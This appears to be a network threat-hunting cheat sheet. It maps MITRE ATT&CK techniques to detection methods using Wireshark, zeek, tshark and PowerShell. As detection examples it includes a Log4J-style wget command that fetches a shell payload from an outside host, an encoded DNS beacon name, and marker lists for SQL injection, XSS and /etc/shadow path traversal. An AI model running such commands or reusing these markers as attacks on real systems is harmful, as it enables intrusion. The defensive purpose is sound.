search

NetworkThreatHunting

hashtag
DNS Beaconing T1071.004arrow-up-right

  1. Look for DNS traffic that contains encoded DNS question names like "dns.question.name cm9vdEAxOTguNTEuMTAwLjI2LTg3NDU2dy1sc2xlZDEyLVNVU0UtNC4xMi4xNC05NC40MS1kZWZhdWx0ICMxIFNNUCBXZWQgT2N0IDMxIDEyOjI1OjA0IFVUQyAyMDE4ICgzMDkwOTAxKQo=.evil.local". Which decodes to DNS beacon.

  2. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

  3. Examine the DNS cache using Get-DnsClientCache | ? Entry -NotMatch "workst|servst|memes|kerb|ws|ocsp" | out-string -width 1000.

hashtag
Find JNDI Exploitation/Log4J T1190arrow-up-right

  1. Look for log traffic with wget http[:]//awk3hd9encccccA_diesla[:]8000/get_shell_payload and java log4j_execution.java wget http://awk3hd9encccccA_diesla:8000/get_shell_payload like attempts. It should contain Java within the command.

hashtag
Find SQL Injection T1190arrow-up-right

  1. Look for ', ---, #, UNION, WAITFOR DELAY, and SLEEP() statements in web traffic.

hashtag
Find Cross Site Scripting T1189arrow-up-right

  1. Look for <script>, onmouseover, onclick, and onerror statements in traffic.

hashtag
Find Path Traversal

  1. Look for traffic with /etc/shadow and /etc/passwd in the traffic.

  2. Look for traffic with %2E%2E%2F%2E%2E%2F url encoded data.

  3. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Detect Self Signed Certificates T1587.003arrow-up-right

  1. Identify Server or Client traffic in Wireshark with "Certificate, Server Key Exchange, Server Hello Done" and identify the issuer and subject. If same, then self signed.

hashtag
Detect Zone Transfer T1590.002arrow-up-right

  1. Use WireShark to find DNS zone transfers with dns.qry.type == 252.

hashtag
Detect Port Scanning T1595.001arrow-up-right

  1. Filter traffic in WireShark for source and destination IP with SYN ACK (tcp.flags == 0x0012) to show ports that responded to SYN from the adversary.

  2. Filter traffic in WireShark for source and destination IP with reset flag set by the target using tcp.flags.reset == 1.

  3. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Identify Web Scanning T1595.003arrow-up-right

  1. Filter traffic in WireShark to display the various URIs and GET requests from HTTP traffic. A large number means adversary is web scanning.

  2. Look for all subdomains during web scanning in WireShark with _ws.col.info == "HTTP/1.1 200 OK (text/html)".

  3. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Identify LLMNR Poisoning T1557.001arrow-up-right

  1. Filter for "LLMNR" traffic within wireshark pcap and identify numerous resquests and response failures from a machine. There will be NTLMSSP_NEGOTIATE, NTLMSSP_CHALLENGE, and NTLMSSP_AUTH messages.

hashtag
Identify Credential Stuffing T1110.004arrow-up-right

  1. Use wireshark with http traffic to identify username and password combinations to the same destination IP address, repeatedly using POST REQUESTS, and in quick succession. The HTTP status of 404 is a common response from the target.

  2. Use tshark to filter and identify repeated POST requests with username and password combinations.

    • Command line: $ tshark -Y "http.request.method==POST and ip.src ==156.146.62.213 and http.request.uri contains loginservice" -r meerkat.pcap -T fields -e text | cut -d " " -f 7,11 | sort | uniq

hashtag
View Network Connections to Workstation [No TTP]

  1. Use tcpview within Sysinternals

    • tcpview -accepteula

  2. Use the native to windows,resmon via command line

    • resmon

  3. Use procmon within SysInternals

    • procmon -accepteula

  4. Use zeek with conn.log from a pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

  5. Use Get-NetTCPConnection -State Listen | Select-Objecct -Property LocalAddress,LocalPort,OwingProcess within Powershell

  6. Use tcpdump on the command line.

    • Command to use is tcpdump -r file -n

  7. Use volatilityarrow-up-right with a forensic image.

    • Version 3 uses windows.netscan.NetScan

  8. Use Ritaarrow-up-right to find beaconing activity.

  9. Use SRUM Dumparrow-up-right to examine system usages related to processes.

  10. View old network connections at SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged or SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed or SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache.

  11. Use eventvwr.msc with Windows Security Event logs 5156 for Windows Filtering Platform permitted connections.

  12. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

  13. Use Get-NetTCPConnection | select LocalAddress,localport,remoteaddress,remoteport,state,@{name="process";Expression={(get-process -id $_.OwningProcess).ProcessName}}, @{Name="cmdline";Expression={(Get-WmiObject Win32_Process -filter "ProcessId = $($_.OwningProcess)").commandline}} | sort Remoteaddress -Descending | ft -wrap -autosize to look at TCP Connections.

  14. Use Get-NetUDPEndpoint | select local*,creationtime, remote* | ft -autosize to look for UDP connections.

hashtag
View Network Flow to/from Workstations [No TTP]

  1. Use zeek with conn.log from a pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

  2. Use Ritaarrow-up-right to find beaconing activity.

  3. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

  4. Use Get-NetTCPConnection | select LocalAddress,localport,remoteaddress,remoteport,state,@{name="process";Expression={(get-process -id $_.OwningProcess).ProcessName}}, @{Name="cmdline";Expression={(Get-WmiObject Win32_Process -filter "ProcessId = $($_.OwningProcess)").commandline}} | sort Remoteaddress -Descending | ft -wrap -autosize to look at TCP Connections.

  5. Use Get-NetUDPEndpoint | select local*,creationtime, remote* | ft -autosize to look for UDP connections.

hashtag
View DHCP Leases [No TTP]

  1. Use zeek with dhcp.log from pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

  2. Use Wireshark and filter on DHCP traffic.

hashtag
View DNS Activity [No TTP]

  1. Use zeek with dns.log from pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

  2. Use Wireshark and filter on DNS traffic.

  3. Use Ritaarrow-up-right to find beaconing activity.

  4. Use WireShark to find DNS zone transfers with dns.qry.type == 252.

  5. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

  6. Check the DNS cache with Get-DnsClientCache | ? Entry -NotMatch "workst|servst|memes|kerb|ws|ocsp" | out-string -width 1000.

hashtag
View SNMP Activity [No TTP]

  1. Use zeek with snmp.log from pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

  2. Use Wireshark and filter on SNMP traffic.

hashtag
View Syslog Activity [No TTP]

  1. Use zeek with syslog.log from pcap

    • zeek-cut can be beneficial on the command line to pick specific fields

hashtag
View File Hashes In Transit T1020arrow-up-right

  1. Use zeek with the /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek framework

    • zeek-cut can be beneficial on the command line to pick specific fields

    • examine the files.log file

hashtag
Extract Files in Transit T1020arrow-up-right T1048arrow-up-right

  1. Use zeek with the /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek framework

    • zeek-cut can be beneficial on the command line to pick specific fields

    • examine the extract-files folder

  2. Use Wireshark and extract objects.

hashtag
View Cleartext Information in HTTP Traffic T1020arrow-up-right T1048.003arrow-up-right T1567arrow-up-right

  1. Use zeek with the zeek-sniffpass package

    • zeek-cut can be beneficial on the command line to pick specific fields

  2. Use Wireshark and examine packets.

  3. Use ES|QL within Elastic with:

  4. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
View GEO IP Information in Traffic [No TTP]

  1. Use zeek with the geoip-conn package.

    • zeek-cut can be beneficial on the command line to pick specific fields

hashtag
Detect Log4J Exploitation T1059.007arrow-up-right

  1. Use zeek with the /opt/zeek/share/zeek/site/cve-2021-44228 script/package

    • zeek-cut can be beneficial on the command line to pick specific fields

    • examine the log4j.log file

hashtag
Determine Number of Network Connections [No TTP]

  1. Use Get-WinEvent with Sysmon Event Logs.

    • Command to use is Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 | Measure-Object

  2. Use Wireshark statistics.

hashtag
Find Beaconing within ICMP Packets T1020arrow-up-right T1048.003arrow-up-right

  1. Use tshark within the command line.

    • Command to use is "C:\Program Files\Wireshark\tshark.exe" -r pcap_file.pcap -Y "icmp" -T fields -e data

  2. Use Ritaarrow-up-right to find beaconing activity.

  3. Use ES|QL within Elastic with:

hashtag
Find Beaconing Activity T1048arrow-up-right T1573arrow-up-right

  1. Use Ritaarrow-up-right to find beaconing activity.

  2. Use ES|QL within Elastic with:

hashtag
Find VPN Connections T1333arrow-up-right

  1. Use Event ID 6272 within windows security logs for external IP of user.

hashtag
View RDP Connections T1210arrow-up-right T1563.002arrow-up-right

  1. Look for port 3389 connections within network traffic.

  2. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

  3. Run qwinsta on the command line to view RDP connections.

hashtag
View WMI Traffic T1047arrow-up-right

  1. Identify traffic on port 135 or 137 with dce_rpc service.

  2. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
View Non Standard Port Traffic T1509arrow-up-right.

  1. Use PSReadline to view scriptblock activity.

  2. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Identify Web Shells T1505.003arrow-up-right

  1. Look for out of date browser agents with HTTP traffic on port 80.

  2. Look for connections to webpages like .php, .aspx, .jsp, or .asp.

  3. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Identify Ping Sweeps

  1. Use tcpdump with -n to resolve.

    • Command to use: tcpdump -r pcap 'host 92.242.140.21' -n.

  2. Look at Firewall logs on the host at C:\Windows\System32\LogFiles\Firewall.

hashtag
Identify Sharphound/Bloodhound Activity T1087arrow-up-right T1482arrow-up-rightT1615arrow-up-rightT1069arrow-up-rightT1018arrow-up-right T1033arrow-up-right

  1. Look for increase in traffic with destination port 445 and destination process ntoskrnl.exe to each workstation within a domain.

PreviousLinuxNetworkThreatHunting

Last updated